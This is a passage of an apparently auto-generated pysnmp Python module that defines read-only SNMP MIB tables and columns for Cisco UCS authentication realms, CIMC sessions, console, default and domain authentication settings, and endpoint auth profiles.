cucsAaaAuthRealmFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmPrev.setStatus('current')
cucsAaaAuthRealmFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmProgr.setStatus('current')
cucsAaaAuthRealmFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtInvErrCode.setStatus('current')
cucsAaaAuthRealmFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtInvErrDescr.setStatus('current')
cucsAaaAuthRealmFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 13), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtInvRslt.setStatus('current')
cucsAaaAuthRealmFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 14), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageDescr.setStatus('current')
cucsAaaAuthRealmFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 15), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStamp.setStatus('current')
cucsAaaAuthRealmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStatus.setStatus('current')
cucsAaaAuthRealmFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmTry.setStatus('current')
cucsAaaAuthRealmIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 18), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmIntId.setStatus('current')
cucsAaaAuthRealmName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 19), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmName.setStatus('current')
cucsAaaAuthRealmPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 20), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmPolicyLevel.setStatus('current')
cucsAaaAuthRealmPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 21), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmPolicyOwner.setStatus('current')
cucsAaaAuthRealmFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41), )
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmTable.setStatus('current')
cucsAaaAuthRealmFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaAuthRealmFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmEntry.setStatus('current')
cucsAaaAuthRealmFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmInstanceId.setStatus('current')
cucsAaaAuthRealmFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmDn.setStatus('current')
cucsAaaAuthRealmFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRn.setStatus('current')
cucsAaaAuthRealmFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmCompletionTime.setStatus('current')
cucsAaaAuthRealmFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 5), CucsAaaAuthRealmFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmCurrentFsm.setStatus('current')
cucsAaaAuthRealmFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmDescrData.setStatus('current')
cucsAaaAuthRealmFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmFsmStatus.setStatus('current')
cucsAaaAuthRealmFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmProgress.setStatus('current')
cucsAaaAuthRealmFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtErrCode.setStatus('current')
cucsAaaAuthRealmFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtErrDescr.setStatus('current')
cucsAaaAuthRealmFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 41, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmRmtRslt.setStatus('current')
cucsAaaAuthRealmFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42), )
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageTable.setStatus('current')
cucsAaaAuthRealmFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaAuthRealmFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageEntry.setStatus('current')
cucsAaaAuthRealmFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageInstanceId.setStatus('current')
cucsAaaAuthRealmFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageDn.setStatus('current')
cucsAaaAuthRealmFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageRn.setStatus('current')
cucsAaaAuthRealmFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageDescrData.setStatus('current')
cucsAaaAuthRealmFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageLastUpdateTime.setStatus('current')
cucsAaaAuthRealmFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 6), CucsAaaAuthRealmFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageName.setStatus('current')
cucsAaaAuthRealmFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageOrder.setStatus('current')
cucsAaaAuthRealmFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageRetry.setStatus('current')
cucsAaaAuthRealmFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 42, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmStageStageStatus.setStatus('current')
cucsAaaCimcSessionTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55), )
if mibBuilder.loadTexts: cucsAaaCimcSessionTable.setStatus('current')
cucsAaaCimcSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaCimcSessionInstanceId"))
if mibBuilder.loadTexts: cucsAaaCimcSessionEntry.setStatus('current')
cucsAaaCimcSessionInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaCimcSessionInstanceId.setStatus('current')
cucsAaaCimcSessionDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionDn.setStatus('current')
cucsAaaCimcSessionRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionRn.setStatus('current')
cucsAaaCimcSessionAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 4), CucsAaaSessionState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionAdminState.setStatus('current')
cucsAaaCimcSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionId.setStatus('current')
cucsAaaCimcSessionIntDel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionIntDel.setStatus('current')
cucsAaaCimcSessionIsDelete = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 7), CucsAaaClear()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionIsDelete.setStatus('current')
cucsAaaCimcSessionLastUpdatedTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 8), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionLastUpdatedTime.setStatus('current')
cucsAaaCimcSessionLoginTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 9), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionLoginTime.setStatus('current')
cucsAaaCimcSessionLsDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionLsDn.setStatus('current')
cucsAaaCimcSessionPid = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionPid.setStatus('current')
cucsAaaCimcSessionPnDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionPnDn.setStatus('current')
cucsAaaCimcSessionPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionPriv.setStatus('current')
cucsAaaCimcSessionSourceAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 14), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionSourceAddr.setStatus('current')
cucsAaaCimcSessionType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 15), CucsAaaCimcSessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionType.setStatus('current')
cucsAaaCimcSessionUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionUser.setStatus('current')
cucsAaaCimcSessionCimcAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 55, 1, 17), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaCimcSessionCimcAddr.setStatus('current')
cucsAaaConsoleAuthTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2), )
if mibBuilder.loadTexts: cucsAaaConsoleAuthTable.setStatus('current')
cucsAaaConsoleAuthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaConsoleAuthInstanceId"))
if mibBuilder.loadTexts: cucsAaaConsoleAuthEntry.setStatus('current')
cucsAaaConsoleAuthInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaConsoleAuthInstanceId.setStatus('current')
cucsAaaConsoleAuthDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthDn.setStatus('current')
cucsAaaConsoleAuthRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthRn.setStatus('current')
cucsAaaConsoleAuthDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthDescr.setStatus('current')
cucsAaaConsoleAuthName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthName.setStatus('current')
cucsAaaConsoleAuthProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthProviderGroup.setStatus('current')
cucsAaaConsoleAuthRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 8), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthRealm.setStatus('current')
cucsAaaConsoleAuthOperProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthOperProviderGroup.setStatus('current')
cucsAaaConsoleAuthOperRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 10), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthOperRealm.setStatus('current')
cucsAaaConsoleAuthUse2Factor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 2, 1, 11), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaConsoleAuthUse2Factor.setStatus('current')
cucsAaaDefaultAuthTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3), )
if mibBuilder.loadTexts: cucsAaaDefaultAuthTable.setStatus('current')
cucsAaaDefaultAuthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaDefaultAuthInstanceId"))
if mibBuilder.loadTexts: cucsAaaDefaultAuthEntry.setStatus('current')
cucsAaaDefaultAuthInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaDefaultAuthInstanceId.setStatus('current')
cucsAaaDefaultAuthDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthDn.setStatus('current')
cucsAaaDefaultAuthRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthRn.setStatus('current')
cucsAaaDefaultAuthDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthDescr.setStatus('current')
cucsAaaDefaultAuthName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthName.setStatus('current')
cucsAaaDefaultAuthProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthProviderGroup.setStatus('current')
cucsAaaDefaultAuthRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 8), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthRealm.setStatus('current')
cucsAaaDefaultAuthRefreshPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthRefreshPeriod.setStatus('current')
cucsAaaDefaultAuthSessionTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthSessionTimeout.setStatus('current')
cucsAaaDefaultAuthOperProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthOperProviderGroup.setStatus('current')
cucsAaaDefaultAuthOperRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 12), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthOperRealm.setStatus('current')
cucsAaaDefaultAuthUse2Factor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthUse2Factor.setStatus('current')
cucsAaaDefaultAuthConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 14), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthConfigState.setStatus('current')
cucsAaaDefaultAuthConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 3, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDefaultAuthConfigStatusMessage.setStatus('current')
cucsAaaDomainTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4), )
if mibBuilder.loadTexts: cucsAaaDomainTable.setStatus('current')
cucsAaaDomainEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaDomainInstanceId"))
if mibBuilder.loadTexts: cucsAaaDomainEntry.setStatus('current')
cucsAaaDomainInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaDomainInstanceId.setStatus('current')
cucsAaaDomainDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainDn.setStatus('current')
cucsAaaDomainRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainRn.setStatus('current')
cucsAaaDomainDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainDescr.setStatus('current')
cucsAaaDomainName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainName.setStatus('current')
cucsAaaDomainRefreshPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainRefreshPeriod.setStatus('current')
cucsAaaDomainSessionTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainSessionTimeout.setStatus('current')
cucsAaaDomainConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 9), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainConfigState.setStatus('current')
cucsAaaDomainConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 4, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainConfigStatusMessage.setStatus('current')
cucsAaaDomainAuthTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5), )
if mibBuilder.loadTexts: cucsAaaDomainAuthTable.setStatus('current')
cucsAaaDomainAuthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaDomainAuthInstanceId"))
if mibBuilder.loadTexts: cucsAaaDomainAuthEntry.setStatus('current')
cucsAaaDomainAuthInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaDomainAuthInstanceId.setStatus('current')
cucsAaaDomainAuthDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthDn.setStatus('current')
cucsAaaDomainAuthRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthRn.setStatus('current')
cucsAaaDomainAuthDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthDescr.setStatus('current')
cucsAaaDomainAuthName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthName.setStatus('current')
cucsAaaDomainAuthProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthProviderGroup.setStatus('current')
cucsAaaDomainAuthRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 8), CucsAaaDomainAuthRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthRealm.setStatus('current')
cucsAaaDomainAuthOperProviderGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthOperProviderGroup.setStatus('current')
cucsAaaDomainAuthOperRealm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 10), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthOperRealm.setStatus('current')
cucsAaaDomainAuthUse2Factor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 5, 1, 11), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaDomainAuthUse2Factor.setStatus('current')
cucsAaaEpAuthProfileTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6), )
if mibBuilder.loadTexts: cucsAaaEpAuthProfileTable.setStatus('current')
cucsAaaEpAuthProfileEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaEpAuthProfileInstanceId"))
if mibBuilder.loadTexts: cucsAaaEpAuthProfileEntry.setStatus('current')
cucsAaaEpAuthProfileInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaEpAuthProfileInstanceId.setStatus('current')
cucsAaaEpAuthProfileDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileDn.setStatus('current')
cucsAaaEpAuthProfileRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileRn.setStatus('current')
cucsAaaEpAuthProfileDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileDescr.setStatus('current')
cucsAaaEpAuthProfileIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileIntId.setStatus('current')
cucsAaaEpAuthProfileName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 6, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaEpAuthProfileName.setStatus('current')
